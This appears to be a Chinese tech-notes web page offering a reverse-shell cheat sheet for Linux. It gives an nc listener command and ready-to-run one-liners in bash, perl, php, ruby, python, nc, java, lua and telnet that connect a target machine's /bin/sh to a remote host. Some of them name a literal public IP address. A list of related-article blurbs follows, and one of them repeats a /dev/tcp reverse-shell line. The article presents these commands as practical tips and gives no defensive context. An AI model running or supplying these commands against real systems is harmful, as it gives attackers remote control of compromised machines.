当前位置：首页 > 编程笔记 >

Linux下NC反弹shell命令（推荐）

申屠宗清

2023-03-14

本文向大家介绍Linux下NC反弹shell命令（推荐），包括了Linux下NC反弹shell命令（推荐）的使用技巧和注意事项，需要的朋友参考一下

本机开启监听：

nc -lvnp 4444
nc -vvlp 4444

目标机器开启反弹

bash版本：

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl版本：

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php版本：

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby版本：

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

python版本：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc版本：

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

java版本：

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

lua版本：

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

NC版本不使用-e参数：

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe
 /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
 mknod backpipe p && telnet 173.214.173.151 8080 0backpipe

以上所述是小编给大家介绍的Linux下NC反弹shell命令，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对小牛知识库网站的支持！

类似资料：

Linux命令下crontab命令

本文向大家介绍Linux命令下crontab命令，包括了Linux命令下crontab命令的使用技巧和注意事项，需要的朋友参考一下 crontab是一个用来设置、删除或显示供守护进程cron执行的定时任务的命令。每一个用户都可以拥有属于自己的定时任务，定时任务文件默认以用户名命名，并放在/var/spool/cron目录，该目录普通用户无访问权限。　　可以通过cron.allow 和 cron.
linux反弹shell的原理详解

本文向大家介绍linux反弹shell的原理详解，包括了linux反弹shell的原理详解的使用技巧和注意事项，需要的朋友参考一下完整命令反弹shell命令：利用nc反弹shell：原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入，
linux下执行shell命令方法简介

本文向大家介绍linux下执行shell命令方法简介，包括了linux下执行shell命令方法简介的使用技巧和注意事项，需要的朋友参考一下 linux下执行shell命令有两种方法在当前shell中执行shell命令在当前shell中产生一个subshell，在subshell中执行shell命令 1.在当前shell中执行shell命令主要就是在命令行中通过交互方式方式直接输入shel
Python下调用Linux的Shell命令的方法

本文向大家介绍Python下调用Linux的Shell命令的方法，包括了Python下调用Linux的Shell命令的方法的使用技巧和注意事项，需要的朋友参考一下有时候难免需要直接调用Shell命令来完成一些比较简单的操作，比如mount一个文件系统之类的。那么我们使用Python如何调用Linux的Shell命令？下面来介绍几种常用的方法： 1. os 模块 1.1. os模块的exec方法族
浅析Linux之bash反弹shell原理

本文向大家介绍浅析Linux之bash反弹shell原理，包括了浅析Linux之bash反弹shell原理的使用技巧和注意事项，需要的朋友参考一下环境攻击机：kali ip：192.168.25.144 靶机：centos ip：192.168.25.142 过程 kali 监听本地8888端口靶机 centos 写入反弹shell 的命令攻击机
如何从Java调用Linux Shell命令

问题内容：我正在尝试使用重定向和管道从Java执行一些Linux命令。Java如何调用或命令？我试图用这个：但是它与重定向或管道不兼容。问题答案：在你的shell中不执行命令尝试代替。编辑：：我的系统上没有，所以我改用。以下为我工作

相关阅读

浅析Linux之bash反弹shell原理如何从Java调用Linux Shell命令 Shell+Linux命令实现日志分析 Linux shell命令帮助格式详解 Linux shell命令用法及常见用例之tar命令

相关文章

Linux终止进程（kill命令）Linux whoami和who am i命令 Linux tar打包命令详解 Linux创建目录（mkdir命令）Linux切换目录（cd命令）

相关问答

从android执行shell命令从gulp运行shell命令 Visual Studio代码-“Shell命令：在PATH命令中安装'Code'命令。”visual studio代码“shell命令：在PATH命令中安装'code'命令。”visual studio代码“shell命令：在PATH命令中安装”code“命令。

相关工具

spring-nc nc-cms 《Redis 命令参考》shell Translate Shell

相关文档

PHPer 必知必会的 Linux 命令 Go 命令教程 Redis 常用命令命令行的艺术 Redis 2.6 命令参考